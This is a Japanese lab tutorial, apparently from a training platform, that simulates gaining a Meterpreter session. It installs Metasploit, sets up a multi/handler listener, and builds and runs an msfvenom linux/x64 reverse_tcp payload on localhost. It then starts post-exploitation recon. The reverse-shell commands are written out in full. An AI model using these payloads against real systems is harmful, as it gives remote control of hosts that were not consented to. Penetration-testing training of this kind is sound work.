ターゲットの内部ネットワーク上のサービスを特定する
このステップでは、ターゲットマシン上で Meterpreter セッションを取得することをシミュレートします。実際のシナリオでは、これは脆弱性を悪用することによって達成されます。この実験では、Metasploit でリスナーを設定し、ペイロードを手動で実行して接続します。これにより、ポストエクスプロイトフェーズに焦点を当てることができます。
まず、Metasploit Framework をインストールする必要があります。
curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall
chmod 755 msfinstall
sudo ./msfinstall
次に、ターミナルを開き、Metasploit コンソールを起動します。
msfconsole -q
msfconsole内で、着信接続をリッスンするハンドラーを設定します。
use multi/handler
set payload linux/x64/meterpreter/reverse_tcp
set LHOST 127.0.0.1
set LPORT 4444
exploit -j
ここで、新しいターミナルを開きます(ターミナルタブの「+」ボタンを使用できます)。この新しいターミナルで、リスナーに接続するためのペイロードを生成して実行します。
msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=4444 -f elf -o shell.elf
chmod +x shell.elf
./shell.elf
msfconsoleのある最初のターミナルに戻ります。新しいセッションが開かれたことを示すメッセージが表示されるはずです。それにアクセスしましょう。
sessions -l
sessions -i 1
これで Meterpreter セッションに入りました。一般的な最初のステップは偵察を実行することです。「侵害された」ホストのネットワークインターフェイスを確認しましょう。
ifconfig
いくつかのネットワークインターフェイスが表示されます。この実験では、さらなるスキャン(この実験の範囲外です)を通じて、127.0.0.1のポート8080で Web サービスが実行されていることを発見したと仮定します。私たちの目標は、このサービスにアクセスすることです。